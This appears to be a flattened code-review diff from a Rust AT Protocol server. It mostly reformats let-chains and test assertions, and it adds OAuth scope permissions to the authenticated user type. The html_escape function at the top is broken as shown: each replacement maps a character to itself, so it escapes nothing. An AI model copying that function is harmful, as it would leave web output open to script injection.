-
fn html_escape(s: &str) -> String {
574
-
s.replace('&', "&")
575
-
.replace('<', "<")
576
-
.replace('>', ">")
577
-
.replace('"', """)
578
-
.replace('\'', "'")
579
-
}
580
-
581
-
pub fn mask_email(email: &str) -> String {
582
-
if let Some(at_pos) = email.find('@') {
583
-
let local = &email[..at_pos];
584
-
let domain = &email[at_pos..];
585
-
if local.len() <= 2 {
586
-
format!("{}***{}", local.chars().next().unwrap_or('*'), domain)
587
-
} else {
588
-
let first = local.chars().next().unwrap_or('*');
589
-
let last = local.chars().last().unwrap_or('*');
590
-
format!("{}***{}{}", first, last, domain)
591
-
}
592
-
} else {
593
-
"***".to_string()
594
-
}
595
-
}
···
+1
src/oauth/types.rs
+1
src/oauth/types.rs
+13
-6
src/oauth/verify.rs
+13
-6
src/oauth/verify.rs
···
14
use super::OAuthError;
15
use super::db;
16
use super::dpop::DPoPVerifier;
17
use crate::config::AuthConfig;
18
use crate::state::AppState;
19
···
175
pub client_id: Option<String>,
176
pub scope: Option<String>,
177
pub is_oauth: bool,
178
}
179
180
pub struct OAuthAuthError {
···
244
client_id: None,
245
scope: None,
246
is_oauth: false,
247
});
248
}
249
let http_method = parts.method.as_str();
250
let http_uri = parts.uri.to_string();
251
match verify_oauth_access_token(&state.db, token, dpop_proof, http_method, &http_uri).await
252
{
253
-
Ok(result) => Ok(OAuthUser {
254
-
did: result.did,
255
-
client_id: Some(result.client_id),
256
-
scope: result.scope,
257
-
is_oauth: true,
258
-
}),
259
Err(OAuthError::UseDpopNonce(nonce)) => Err(OAuthAuthError {
260
status: StatusCode::UNAUTHORIZED,
261
error: "use_dpop_nonce".to_string(),
···
14
use super::OAuthError;
15
use super::db;
16
use super::dpop::DPoPVerifier;
17
+
use super::scopes::ScopePermissions;
18
use crate::config::AuthConfig;
19
use crate::state::AppState;
20
···
176
pub client_id: Option<String>,
177
pub scope: Option<String>,
178
pub is_oauth: bool,
179
+
pub permissions: ScopePermissions,
180
}
181
182
pub struct OAuthAuthError {
···
246
client_id: None,
247
scope: None,
248
is_oauth: false,
249
+
permissions: ScopePermissions::default(),
250
});
251
}
252
let http_method = parts.method.as_str();
253
let http_uri = parts.uri.to_string();
254
match verify_oauth_access_token(&state.db, token, dpop_proof, http_method, &http_uri).await
255
{
256
+
Ok(result) => {
257
+
let permissions = ScopePermissions::from_scope_string(result.scope.as_deref());
258
+
Ok(OAuthUser {
259
+
did: result.did,
260
+
client_id: Some(result.client_id),
261
+
scope: result.scope,
262
+
is_oauth: true,
263
+
permissions,
264
+
})
265
+
}
266
Err(OAuthError::UseDpopNonce(nonce)) => Err(OAuthAuthError {
267
status: StatusCode::UNAUTHORIZED,
268
error: "use_dpop_nonce".to_string(),
+6
-5
src/plc/mod.rs
+6
-5
src/plc/mod.rs
···
408
PlcError::InvalidResponse("verificationMethods must be an object".to_string())
409
})?;
410
if let Some(atproto_key) = verification_methods.get("atproto").and_then(|v| v.as_str())
411
-
&& atproto_key != ctx.expected_signing_key {
412
-
return Err(PlcError::InvalidResponse(
413
-
"Incorrect signing key".to_string(),
414
-
));
415
-
}
416
let also_known_as = obj
417
.get("alsoKnownAs")
418
.and_then(|v| v.as_array())
···
408
PlcError::InvalidResponse("verificationMethods must be an object".to_string())
409
})?;
410
if let Some(atproto_key) = verification_methods.get("atproto").and_then(|v| v.as_str())
411
+
&& atproto_key != ctx.expected_signing_key
412
+
{
413
+
return Err(PlcError::InvalidResponse(
414
+
"Incorrect signing key".to_string(),
415
+
));
416
+
}
417
let also_known_as = obj
418
.get("alsoKnownAs")
419
.and_then(|v| v.as_array())
+8
-6
src/rate_limit.rs
+8
-6
src/rate_limit.rs
···
122
pub fn extract_client_ip(headers: &HeaderMap, addr: Option<SocketAddr>) -> String {
123
if let Some(forwarded) = headers.get("x-forwarded-for")
124
&& let Ok(value) = forwarded.to_str()
125
-
&& let Some(first_ip) = value.split(',').next() {
126
-
return first_ip.trim().to_string();
127
-
}
128
129
if let Some(real_ip) = headers.get("x-real-ip")
130
-
&& let Ok(value) = real_ip.to_str() {
131
-
return value.trim().to_string();
132
-
}
133
134
addr.map(|a| a.ip().to_string())
135
.unwrap_or_else(|| "unknown".to_string())
···
122
pub fn extract_client_ip(headers: &HeaderMap, addr: Option<SocketAddr>) -> String {
123
if let Some(forwarded) = headers.get("x-forwarded-for")
124
&& let Ok(value) = forwarded.to_str()
125
+
&& let Some(first_ip) = value.split(',').next()
126
+
{
127
+
return first_ip.trim().to_string();
128
+
}
129
130
if let Some(real_ip) = headers.get("x-real-ip")
131
+
&& let Ok(value) = real_ip.to_str()
132
+
{
133
+
return value.trim().to_string();
134
+
}
135
136
addr.map(|a| a.ip().to_string())
137
.unwrap_or_else(|| "unknown".to_string())
+45
-42
src/sync/import.rs
+45
-42
src/sync/import.rs
···
77
Ipld::Map(obj) => {
78
if let Some(Ipld::String(type_str)) = obj.get("$type")
79
&& type_str == "blob"
80
-
&& let Some(Ipld::Link(link_cid)) = obj.get("ref") {
81
-
let mime = obj.get("mimeType").and_then(|v| {
82
-
if let Ipld::String(s) = v {
83
-
Some(s.clone())
84
-
} else {
85
-
None
86
-
}
87
-
});
88
-
return vec![BlobRef {
89
-
cid: link_cid.to_string(),
90
-
mime_type: mime,
91
-
}];
92
}
93
obj.values()
94
.flat_map(|v| find_blob_refs_ipld(v, depth + 1))
95
.collect()
···
110
JsonValue::Object(obj) => {
111
if let Some(JsonValue::String(type_str)) = obj.get("$type")
112
&& type_str == "blob"
113
-
&& let Some(JsonValue::Object(ref_obj)) = obj.get("ref")
114
-
&& let Some(JsonValue::String(link)) = ref_obj.get("$link") {
115
-
let mime = obj
116
-
.get("mimeType")
117
-
.and_then(|v| v.as_str())
118
-
.map(String::from);
119
-
return vec![BlobRef {
120
-
cid: link.clone(),
121
-
mime_type: mime,
122
-
}];
123
-
}
124
obj.values()
125
.flat_map(|v| find_blob_refs(v, depth + 1))
126
.collect()
···
195
});
196
if let (Some(key), Some(record_cid)) = (key, record_cid)
197
&& let Some(record_block) = blocks.get(&record_cid)
198
-
&& let Ok(record_value) =
199
-
serde_ipld_dagcbor::from_slice::<Ipld>(record_block)
200
-
{
201
-
let blob_refs = find_blob_refs_ipld(&record_value, 0);
202
-
let parts: Vec<&str> = key.split('/').collect();
203
-
if parts.len() >= 2 {
204
-
let collection = parts[..parts.len() - 1].join("/");
205
-
let rkey = parts[parts.len() - 1].to_string();
206
-
records.push(ImportedRecord {
207
-
collection,
208
-
rkey,
209
-
cid: record_cid,
210
-
blob_refs,
211
-
});
212
-
}
213
-
}
214
if let Some(Ipld::Link(tree_cid)) = entry_obj.get("t") {
215
stack.push(*tree_cid);
216
}
···
300
.await
301
.map_err(|e| {
302
if let sqlx::Error::Database(ref db_err) = e
303
-
&& db_err.code().as_deref() == Some("55P03") {
304
-
return ImportError::ConcurrentModification;
305
-
}
306
ImportError::Database(e)
307
})?;
308
if repo.is_none() {
···
77
Ipld::Map(obj) => {
78
if let Some(Ipld::String(type_str)) = obj.get("$type")
79
&& type_str == "blob"
80
+
&& let Some(Ipld::Link(link_cid)) = obj.get("ref")
81
+
{
82
+
let mime = obj.get("mimeType").and_then(|v| {
83
+
if let Ipld::String(s) = v {
84
+
Some(s.clone())
85
+
} else {
86
+
None
87
}
88
+
});
89
+
return vec![BlobRef {
90
+
cid: link_cid.to_string(),
91
+
mime_type: mime,
92
+
}];
93
+
}
94
obj.values()
95
.flat_map(|v| find_blob_refs_ipld(v, depth + 1))
96
.collect()
···
111
JsonValue::Object(obj) => {
112
if let Some(JsonValue::String(type_str)) = obj.get("$type")
113
&& type_str == "blob"
114
+
&& let Some(JsonValue::Object(ref_obj)) = obj.get("ref")
115
+
&& let Some(JsonValue::String(link)) = ref_obj.get("$link")
116
+
{
117
+
let mime = obj
118
+
.get("mimeType")
119
+
.and_then(|v| v.as_str())
120
+
.map(String::from);
121
+
return vec![BlobRef {
122
+
cid: link.clone(),
123
+
mime_type: mime,
124
+
}];
125
+
}
126
obj.values()
127
.flat_map(|v| find_blob_refs(v, depth + 1))
128
.collect()
···
197
});
198
if let (Some(key), Some(record_cid)) = (key, record_cid)
199
&& let Some(record_block) = blocks.get(&record_cid)
200
+
&& let Ok(record_value) =
201
+
serde_ipld_dagcbor::from_slice::<Ipld>(record_block)
202
+
{
203
+
let blob_refs = find_blob_refs_ipld(&record_value, 0);
204
+
let parts: Vec<&str> = key.split('/').collect();
205
+
if parts.len() >= 2 {
206
+
let collection = parts[..parts.len() - 1].join("/");
207
+
let rkey = parts[parts.len() - 1].to_string();
208
+
records.push(ImportedRecord {
209
+
collection,
210
+
rkey,
211
+
cid: record_cid,
212
+
blob_refs,
213
+
});
214
+
}
215
+
}
216
if let Some(Ipld::Link(tree_cid)) = entry_obj.get("t") {
217
stack.push(*tree_cid);
218
}
···
302
.await
303
.map_err(|e| {
304
if let sqlx::Error::Database(ref db_err) = e
305
+
&& db_err.code().as_deref() == Some("55P03")
306
+
{
307
+
return ImportError::ConcurrentModification;
308
+
}
309
ImportError::Database(e)
310
})?;
311
if repo.is_none() {
+28
-21
src/sync/util.rs
+28
-21
src/sync/util.rs
···
140
.try_into()
141
.map_err(|e| anyhow::anyhow!("Invalid event: {}", e))?;
142
if let Some(ref pdc) = prev_data_cid_str
143
-
&& let Ok(cid) = Cid::from_str(pdc) {
144
-
frame.prev_data = Some(cid);
145
-
}
146
let commit_cid = frame.commit;
147
let prev_cid = prev_cid_str.as_ref().and_then(|s| Cid::from_str(s).ok());
148
let mut all_cids: Vec<Cid> = block_cids_str
···
155
}
156
if let Some(ref pc) = prev_cid
157
&& let Ok(Some(prev_bytes)) = state.block_store.get(pc).await
158
-
&& let Some(rev) = extract_rev_from_commit_bytes(&prev_bytes) {
159
-
frame.since = Some(rev);
160
-
}
161
let car_bytes = if !all_cids.is_empty() {
162
let fetched = state.block_store.get_many(&all_cids).await?;
163
let mut blocks = std::collections::BTreeMap::new();
···
196
let mut all_cids: Vec<Cid> = Vec::new();
197
for event in events {
198
if let Some(ref commit_cid_str) = event.commit_cid
199
-
&& let Ok(cid) = Cid::from_str(commit_cid_str) {
200
-
all_cids.push(cid);
201
-
}
202
if let Some(ref prev_cid_str) = event.prev_cid
203
-
&& let Ok(cid) = Cid::from_str(prev_cid_str) {
204
-
all_cids.push(cid);
205
-
}
206
if let Some(ref block_cids_str) = event.blocks_cids {
207
for s in block_cids_str {
208
if let Ok(cid) = Cid::from_str(s) {
···
279
.try_into()
280
.map_err(|e| anyhow::anyhow!("Invalid event: {}", e))?;
281
if let Some(ref pdc) = prev_data_cid_str
282
-
&& let Ok(cid) = Cid::from_str(pdc) {
283
-
frame.prev_data = Some(cid);
284
-
}
285
let commit_cid = frame.commit;
286
let prev_cid = prev_cid_str.as_ref().and_then(|s| Cid::from_str(s).ok());
287
let mut all_cids: Vec<Cid> = block_cids_str
···
293
all_cids.push(commit_cid);
294
}
295
if let Some(commit_bytes) = prefetched.get(&commit_cid)
296
-
&& let Some(rev) = extract_rev_from_commit_bytes(commit_bytes) {
297
-
frame.rev = rev;
298
-
}
299
if let Some(ref pc) = prev_cid
300
&& let Some(prev_bytes) = prefetched.get(pc)
301
-
&& let Some(rev) = extract_rev_from_commit_bytes(prev_bytes) {
302
-
frame.since = Some(rev);
303
-
}
304
let car_bytes = if !all_cids.is_empty() {
305
let mut blocks = BTreeMap::new();
306
let mut commit_bytes_for_car: Option<Bytes> = None;
···
140
.try_into()
141
.map_err(|e| anyhow::anyhow!("Invalid event: {}", e))?;
142
if let Some(ref pdc) = prev_data_cid_str
143
+
&& let Ok(cid) = Cid::from_str(pdc)
144
+
{
145
+
frame.prev_data = Some(cid);
146
+
}
147
let commit_cid = frame.commit;
148
let prev_cid = prev_cid_str.as_ref().and_then(|s| Cid::from_str(s).ok());
149
let mut all_cids: Vec<Cid> = block_cids_str
···
156
}
157
if let Some(ref pc) = prev_cid
158
&& let Ok(Some(prev_bytes)) = state.block_store.get(pc).await
159
+
&& let Some(rev) = extract_rev_from_commit_bytes(&prev_bytes)
160
+
{
161
+
frame.since = Some(rev);
162
+
}
163
let car_bytes = if !all_cids.is_empty() {
164
let fetched = state.block_store.get_many(&all_cids).await?;
165
let mut blocks = std::collections::BTreeMap::new();
···
198
let mut all_cids: Vec<Cid> = Vec::new();
199
for event in events {
200
if let Some(ref commit_cid_str) = event.commit_cid
201
+
&& let Ok(cid) = Cid::from_str(commit_cid_str)
202
+
{
203
+
all_cids.push(cid);
204
+
}
205
if let Some(ref prev_cid_str) = event.prev_cid
206
+
&& let Ok(cid) = Cid::from_str(prev_cid_str)
207
+
{
208
+
all_cids.push(cid);
209
+
}
210
if let Some(ref block_cids_str) = event.blocks_cids {
211
for s in block_cids_str {
212
if let Ok(cid) = Cid::from_str(s) {
···
283
.try_into()
284
.map_err(|e| anyhow::anyhow!("Invalid event: {}", e))?;
285
if let Some(ref pdc) = prev_data_cid_str
286
+
&& let Ok(cid) = Cid::from_str(pdc)
287
+
{
288
+
frame.prev_data = Some(cid);
289
+
}
290
let commit_cid = frame.commit;
291
let prev_cid = prev_cid_str.as_ref().and_then(|s| Cid::from_str(s).ok());
292
let mut all_cids: Vec<Cid> = block_cids_str
···
298
all_cids.push(commit_cid);
299
}
300
if let Some(commit_bytes) = prefetched.get(&commit_cid)
301
+
&& let Some(rev) = extract_rev_from_commit_bytes(commit_bytes)
302
+
{
303
+
frame.rev = rev;
304
+
}
305
if let Some(ref pc) = prev_cid
306
&& let Some(prev_bytes) = prefetched.get(pc)
307
+
&& let Some(rev) = extract_rev_from_commit_bytes(prev_bytes)
308
+
{
309
+
frame.since = Some(rev);
310
+
}
311
let car_bytes = if !all_cids.is_empty() {
312
let mut blocks = BTreeMap::new();
313
let mut commit_bytes_for_car: Option<Bytes> = None;
+7
-6
src/sync/verify.rs
+7
-6
src/sync/verify.rs
···
268
stack.push(*tree_cid);
269
}
270
if let Some(Ipld::Link(value_cid)) = entry_obj.get("v")
271
+
&& !blocks.contains_key(value_cid)
272
+
{
273
+
warn!(
274
+
"Record block {} referenced in MST not in CAR (may be expected for partial export)",
275
+
value_cid
276
+
);
277
+
}
278
}
279
}
280
}
+49
-42
src/validation/mod.rs
+49
-42
src/validation/mod.rs
···
111
}
112
}
113
if let Some(langs) = obj.get("langs").and_then(|v| v.as_array())
114
-
&& langs.len() > 3 {
115
-
return Err(ValidationError::InvalidField {
116
-
path: "langs".to_string(),
117
-
message: "Maximum 3 languages allowed".to_string(),
118
-
});
119
-
}
120
if let Some(tags) = obj.get("tags").and_then(|v| v.as_array()) {
121
if tags.len() > 8 {
122
return Err(ValidationError::InvalidField {
···
126
}
127
for (i, tag) in tags.iter().enumerate() {
128
if let Some(tag_str) = tag.as_str()
129
-
&& tag_str.len() > 640 {
130
-
return Err(ValidationError::InvalidField {
131
-
path: format!("tags/{}", i),
132
-
message: "Tag exceeds maximum length of 640 bytes".to_string(),
133
-
});
134
-
}
135
}
136
}
137
Ok(())
···
198
return Err(ValidationError::MissingField("createdAt".to_string()));
199
}
200
if let Some(subject) = obj.get("subject").and_then(|v| v.as_str())
201
-
&& !subject.starts_with("did:") {
202
-
return Err(ValidationError::InvalidField {
203
-
path: "subject".to_string(),
204
-
message: "Subject must be a DID".to_string(),
205
-
});
206
-
}
207
Ok(())
208
}
209
···
215
return Err(ValidationError::MissingField("createdAt".to_string()));
216
}
217
if let Some(subject) = obj.get("subject").and_then(|v| v.as_str())
218
-
&& !subject.starts_with("did:") {
219
-
return Err(ValidationError::InvalidField {
220
-
path: "subject".to_string(),
221
-
message: "Subject must be a DID".to_string(),
222
-
});
223
-
}
224
Ok(())
225
}
226
···
235
return Err(ValidationError::MissingField("createdAt".to_string()));
236
}
237
if let Some(name) = obj.get("name").and_then(|v| v.as_str())
238
-
&& (name.is_empty() || name.len() > 64) {
239
-
return Err(ValidationError::InvalidField {
240
-
path: "name".to_string(),
241
-
message: "Name must be 1-64 characters".to_string(),
242
-
});
243
-
}
244
Ok(())
245
}
246
···
274
return Err(ValidationError::MissingField("createdAt".to_string()));
275
}
276
if let Some(display_name) = obj.get("displayName").and_then(|v| v.as_str())
277
-
&& (display_name.is_empty() || display_name.len() > 240) {
278
-
return Err(ValidationError::InvalidField {
279
-
path: "displayName".to_string(),
280
-
message: "displayName must be 1-240 characters".to_string(),
281
-
});
282
-
}
283
Ok(())
284
}
285
···
328
return Err(ValidationError::MissingField(format!("{}/cid", path)));
329
}
330
if let Some(uri) = obj.get("uri").and_then(|v| v.as_str())
331
-
&& !uri.starts_with("at://") {
332
-
return Err(ValidationError::InvalidField {
333
-
path: format!("{}/uri", path),
334
-
message: "URI must be an at:// URI".to_string(),
335
-
});
336
-
}
337
Ok(())
338
}
339
}
···
111
}
112
}
113
if let Some(langs) = obj.get("langs").and_then(|v| v.as_array())
114
+
&& langs.len() > 3
115
+
{
116
+
return Err(ValidationError::InvalidField {
117
+
path: "langs".to_string(),
118
+
message: "Maximum 3 languages allowed".to_string(),
119
+
});
120
+
}
121
if let Some(tags) = obj.get("tags").and_then(|v| v.as_array()) {
122
if tags.len() > 8 {
123
return Err(ValidationError::InvalidField {
···
127
}
128
for (i, tag) in tags.iter().enumerate() {
129
if let Some(tag_str) = tag.as_str()
130
+
&& tag_str.len() > 640
131
+
{
132
+
return Err(ValidationError::InvalidField {
133
+
path: format!("tags/{}", i),
134
+
message: "Tag exceeds maximum length of 640 bytes".to_string(),
135
+
});
136
+
}
137
}
138
}
139
Ok(())
···
200
return Err(ValidationError::MissingField("createdAt".to_string()));
201
}
202
if let Some(subject) = obj.get("subject").and_then(|v| v.as_str())
203
+
&& !subject.starts_with("did:")
204
+
{
205
+
return Err(ValidationError::InvalidField {
206
+
path: "subject".to_string(),
207
+
message: "Subject must be a DID".to_string(),
208
+
});
209
+
}
210
Ok(())
211
}
212
···
218
return Err(ValidationError::MissingField("createdAt".to_string()));
219
}
220
if let Some(subject) = obj.get("subject").and_then(|v| v.as_str())
221
+
&& !subject.starts_with("did:")
222
+
{
223
+
return Err(ValidationError::InvalidField {
224
+
path: "subject".to_string(),
225
+
message: "Subject must be a DID".to_string(),
226
+
});
227
+
}
228
Ok(())
229
}
230
···
239
return Err(ValidationError::MissingField("createdAt".to_string()));
240
}
241
if let Some(name) = obj.get("name").and_then(|v| v.as_str())
242
+
&& (name.is_empty() || name.len() > 64)
243
+
{
244
+
return Err(ValidationError::InvalidField {
245
+
path: "name".to_string(),
246
+
message: "Name must be 1-64 characters".to_string(),
247
+
});
248
+
}
249
Ok(())
250
}
251
···
279
return Err(ValidationError::MissingField("createdAt".to_string()));
280
}
281
if let Some(display_name) = obj.get("displayName").and_then(|v| v.as_str())
282
+
&& (display_name.is_empty() || display_name.len() > 240)
283
+
{
284
+
return Err(ValidationError::InvalidField {
285
+
path: "displayName".to_string(),
286
+
message: "displayName must be 1-240 characters".to_string(),
287
+
});
288
+
}
289
Ok(())
290
}
291
···
334
return Err(ValidationError::MissingField(format!("{}/cid", path)));
335
}
336
if let Some(uri) = obj.get("uri").and_then(|v| v.as_str())
337
+
&& !uri.starts_with("at://")
338
+
{
339
+
return Err(ValidationError::InvalidField {
340
+
path: format!("{}/uri", path),
341
+
message: "URI must be an at:// URI".to_string(),
342
+
});
343
+
}
344
Ok(())
345
}
346
}
+56
-14
tests/account_notifications.rs
+56
-14
tests/account_notifications.rs
···
1
mod common;
2
use common::{base_url, client, create_account_and_login, get_db_connection_string};
3
-
use tranquil_pds::comms::{NewComms, CommsType, enqueue_comms};
4
use serde_json::{Value, json};
5
use sqlx::PgPool;
6
7
async fn get_pool() -> PgPool {
8
let conn_str = get_db_connection_string().await;
···
33
format!("Subject {}", i),
34
format!("Body {}", i),
35
);
36
-
enqueue_comms(&pool, comms).await.expect("Failed to enqueue");
37
}
38
39
let resp = client
40
-
.get(format!("{}/xrpc/com.tranquil.account.getNotificationHistory", base))
41
.header("Authorization", format!("Bearer {}", token))
42
.send()
43
.await
···
63
"discordId": "123456789"
64
});
65
let resp = client
66
-
.post(format!("{}/xrpc/com.tranquil.account.updateNotificationPrefs", base))
67
.header("Authorization", format!("Bearer {}", token))
68
.json(&prefs)
69
.send()
···
71
.unwrap();
72
assert_eq!(resp.status(), 200);
73
let body: Value = resp.json().await.unwrap();
74
-
assert!(body["verificationRequired"].as_array().unwrap().contains(&json!("discord")));
75
76
let pool = get_pool().await;
77
let user_id: uuid::Uuid = sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did)
···
92
"code": code
93
});
94
let resp = client
95
-
.post(format!("{}/xrpc/com.tranquil.account.confirmChannelVerification", base))
96
.header("Authorization", format!("Bearer {}", token))
97
.json(&input)
98
.send()
···
101
assert_eq!(resp.status(), 200);
102
103
let resp = client
104
-
.get(format!("{}/xrpc/com.tranquil.account.getNotificationPrefs", base))
105
.header("Authorization", format!("Bearer {}", token))
106
.send()
107
.await
···
121
"telegramUsername": "testuser"
122
});
123
let resp = client
124
-
.post(format!("{}/xrpc/com.tranquil.account.updateNotificationPrefs", base))
125
.header("Authorization", format!("Bearer {}", token))
126
.json(&prefs)
127
.send()
···
134
"code": "000000"
135
});
136
let resp = client
137
-
.post(format!("{}/xrpc/com.tranquil.account.confirmChannelVerification", base))
138
.header("Authorization", format!("Bearer {}", token))
139
.json(&input)
140
.send()
···
154
"code": "123456"
155
});
156
let resp = client
157
-
.post(format!("{}/xrpc/com.tranquil.account.confirmChannelVerification", base))
158
.header("Authorization", format!("Bearer {}", token))
159
.json(&input)
160
.send()
···
175
"email": unique_email
176
});
177
let resp = client
178
-
.post(format!("{}/xrpc/com.tranquil.account.updateNotificationPrefs", base))
179
.header("Authorization", format!("Bearer {}", token))
180
.json(&prefs)
181
.send()
···
183
.unwrap();
184
assert_eq!(resp.status(), 200);
185
let body: Value = resp.json().await.unwrap();
186
-
assert!(body["verificationRequired"].as_array().unwrap().contains(&json!("email")));
187
188
let user_id: uuid::Uuid = sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did)
189
.fetch_one(&pool)
···
203
"code": code
204
});
205
let resp = client
206
-
.post(format!("{}/xrpc/com.tranquil.account.confirmChannelVerification", base))
207
.header("Authorization", format!("Bearer {}", token))
208
.json(&input)
209
.send()
···
212
assert_eq!(resp.status(), 200);
213
214
let resp = client
215
-
.get(format!("{}/xrpc/com.tranquil.account.getNotificationPrefs", base))
216
.header("Authorization", format!("Bearer {}", token))
217
.send()
218
.await
···
1
mod common;
2
use common::{base_url, client, create_account_and_login, get_db_connection_string};
3
use serde_json::{Value, json};
4
use sqlx::PgPool;
5
+
use tranquil_pds::comms::{CommsType, NewComms, enqueue_comms};
6
7
async fn get_pool() -> PgPool {
8
let conn_str = get_db_connection_string().await;
···
33
format!("Subject {}", i),
34
format!("Body {}", i),
35
);
36
+
enqueue_comms(&pool, comms)
37
+
.await
38
+
.expect("Failed to enqueue");
39
}
40
41
let resp = client
42
+
.get(format!(
43
+
"{}/xrpc/com.tranquil.account.getNotificationHistory",
44
+
base
45
+
))
46
.header("Authorization", format!("Bearer {}", token))
47
.send()
48
.await
···
68
"discordId": "123456789"
69
});
70
let resp = client
71
+
.post(format!(
72
+
"{}/xrpc/com.tranquil.account.updateNotificationPrefs",
73
+
base
74
+
))
75
.header("Authorization", format!("Bearer {}", token))
76
.json(&prefs)
77
.send()
···
79
.unwrap();
80
assert_eq!(resp.status(), 200);
81
let body: Value = resp.json().await.unwrap();
82
+
assert!(
83
+
body["verificationRequired"]
84
+
.as_array()
85
+
.unwrap()
86
+
.contains(&json!("discord"))
87
+
);
88
89
let pool = get_pool().await;
90
let user_id: uuid::Uuid = sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did)
···
105
"code": code
106
});
107
let resp = client
108
+
.post(format!(
109
+
"{}/xrpc/com.tranquil.account.confirmChannelVerification",
110
+
base
111
+
))
112
.header("Authorization", format!("Bearer {}", token))
113
.json(&input)
114
.send()
···
117
assert_eq!(resp.status(), 200);
118
119
let resp = client
120
+
.get(format!(
121
+
"{}/xrpc/com.tranquil.account.getNotificationPrefs",
122
+
base
123
+
))
124
.header("Authorization", format!("Bearer {}", token))
125
.send()
126
.await
···
140
"telegramUsername": "testuser"
141
});
142
let resp = client
143
+
.post(format!(
144
+
"{}/xrpc/com.tranquil.account.updateNotificationPrefs",
145
+
base
146
+
))
147
.header("Authorization", format!("Bearer {}", token))
148
.json(&prefs)
149
.send()
···
156
"code": "000000"
157
});
158
let resp = client
159
+
.post(format!(
160
+
"{}/xrpc/com.tranquil.account.confirmChannelVerification",
161
+
base
162
+
))
163
.header("Authorization", format!("Bearer {}", token))
164
.json(&input)
165
.send()
···
179
"code": "123456"
180
});
181
let resp = client
182
+
.post(format!(
183
+
"{}/xrpc/com.tranquil.account.confirmChannelVerification",
184
+
base
185
+
))
186
.header("Authorization", format!("Bearer {}", token))
187
.json(&input)
188
.send()
···
203
"email": unique_email
204
});
205
let resp = client
206
+
.post(format!(
207
+
"{}/xrpc/com.tranquil.account.updateNotificationPrefs",
208
+
base
209
+
))
210
.header("Authorization", format!("Bearer {}", token))
211
.json(&prefs)
212
.send()
···
214
.unwrap();
215
assert_eq!(resp.status(), 200);
216
let body: Value = resp.json().await.unwrap();
217
+
assert!(
218
+
body["verificationRequired"]
219
+
.as_array()
220
+
.unwrap()
221
+
.contains(&json!("email"))
222
+
);
223
224
let user_id: uuid::Uuid = sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did)
225
.fetch_one(&pool)
···
239
"code": code
240
});
241
let resp = client
242
+
.post(format!(
243
+
"{}/xrpc/com.tranquil.account.confirmChannelVerification",
244
+
base
245
+
))
246
.header("Authorization", format!("Bearer {}", token))
247
.json(&input)
248
.send()
···
251
assert_eq!(resp.status(), 200);
252
253
let resp = client
254
+
.get(format!(
255
+
"{}/xrpc/com.tranquil.account.getNotificationPrefs",
256
+
base
257
+
))
258
.header("Authorization", format!("Bearer {}", token))
259
.send()
260
.await
+36
-9
tests/admin_search.rs
+36
-9
tests/admin_search.rs
···
21
.expect("Failed to send request");
22
assert_eq!(res.status(), StatusCode::OK);
23
let body: Value = res.json().await.unwrap();
24
-
let accounts = body["accounts"].as_array().expect("accounts should be array");
25
assert!(!accounts.is_empty(), "Should return some accounts");
26
-
let found = accounts.iter().any(|a| a["did"].as_str() == Some(&user_did));
27
-
assert!(found, "Should find the created user in results (DID: {})", user_did);
28
}
29
30
#[tokio::test]
···
61
assert_eq!(res.status(), StatusCode::OK);
62
let body: Value = res.json().await.unwrap();
63
let accounts = body["accounts"].as_array().unwrap();
64
-
assert_eq!(accounts.len(), 1, "Should find exactly one account with this handle");
65
assert_eq!(accounts[0]["handle"].as_str(), Some(unique_handle.as_str()));
66
}
67
···
100
assert_eq!(res2.status(), StatusCode::OK);
101
let body2: Value = res2.json().await.unwrap();
102
let accounts2 = body2["accounts"].as_array().unwrap();
103
-
assert!(!accounts2.is_empty(), "Should return more accounts after cursor");
104
-
let first_page_dids: Vec<&str> = accounts.iter().map(|a| a["did"].as_str().unwrap()).collect();
105
-
let second_page_dids: Vec<&str> = accounts2.iter().map(|a| a["did"].as_str().unwrap()).collect();
106
for did in &second_page_dids {
107
-
assert!(!first_page_dids.contains(did), "Second page should not repeat first page DIDs");
108
}
109
}
110
···
160
let account = &accounts[0];
161
assert!(account["did"].as_str().is_some(), "Should have did");
162
assert!(account["handle"].as_str().is_some(), "Should have handle");
163
-
assert!(account["indexedAt"].as_str().is_some(), "Should have indexedAt");
164
}
···
21
.expect("Failed to send request");
22
assert_eq!(res.status(), StatusCode::OK);
23
let body: Value = res.json().await.unwrap();
24
+
let accounts = body["accounts"]
25
+
.as_array()
26
+
.expect("accounts should be array");
27
assert!(!accounts.is_empty(), "Should return some accounts");
28
+
let found = accounts
29
+
.iter()
30
+
.any(|a| a["did"].as_str() == Some(&user_did));
31
+
assert!(
32
+
found,
33
+
"Should find the created user in results (DID: {})",
34
+
user_did
35
+
);
36
}
37
38
#[tokio::test]
···
69
assert_eq!(res.status(), StatusCode::OK);
70
let body: Value = res.json().await.unwrap();
71
let accounts = body["accounts"].as_array().unwrap();
72
+
assert_eq!(
73
+
accounts.len(),
74
+
1,
75
+
"Should find exactly one account with this handle"
76
+
);
77
assert_eq!(accounts[0]["handle"].as_str(), Some(unique_handle.as_str()));
78
}
79
···
112
assert_eq!(res2.status(), StatusCode::OK);
113
let body2: Value = res2.json().await.unwrap();
114
let accounts2 = body2["accounts"].as_array().unwrap();
115
+
assert!(
116
+
!accounts2.is_empty(),
117
+
"Should return more accounts after cursor"
118
+
);
119
+
let first_page_dids: Vec<&str> = accounts
120
+
.iter()
121
+
.map(|a| a["did"].as_str().unwrap())
122
+
.collect();
123
+
let second_page_dids: Vec<&str> = accounts2
124
+
.iter()
125
+
.map(|a| a["did"].as_str().unwrap())
126
+
.collect();
127
for did in &second_page_dids {
128
+
assert!(
129
+
!first_page_dids.contains(did),
130
+
"Second page should not repeat first page DIDs"
131
+
);
132
}
133
}
134
···
184
let account = &accounts[0];
185
assert!(account["did"].as_str().is_some(), "Should have did");
186
assert!(account["handle"].as_str().is_some(), "Should have handle");
187
+
assert!(
188
+
account["indexedAt"].as_str().is_some(),
189
+
"Should have indexedAt"
190
+
);
191
}
+1
-1
tests/admin_stats.rs
+1
-1
tests/admin_stats.rs
+10
-2
tests/change_password.rs
+10
-2
tests/change_password.rs
···
57
.send()
58
.await
59
.expect("Failed to try old password");
60
-
assert_eq!(login_old.status(), StatusCode::UNAUTHORIZED, "Old password should not work");
61
let login_new = client
62
.post(format!(
63
"{}/xrpc/com.atproto.server.createSession",
···
70
.send()
71
.await
72
.expect("Failed to try new password");
73
-
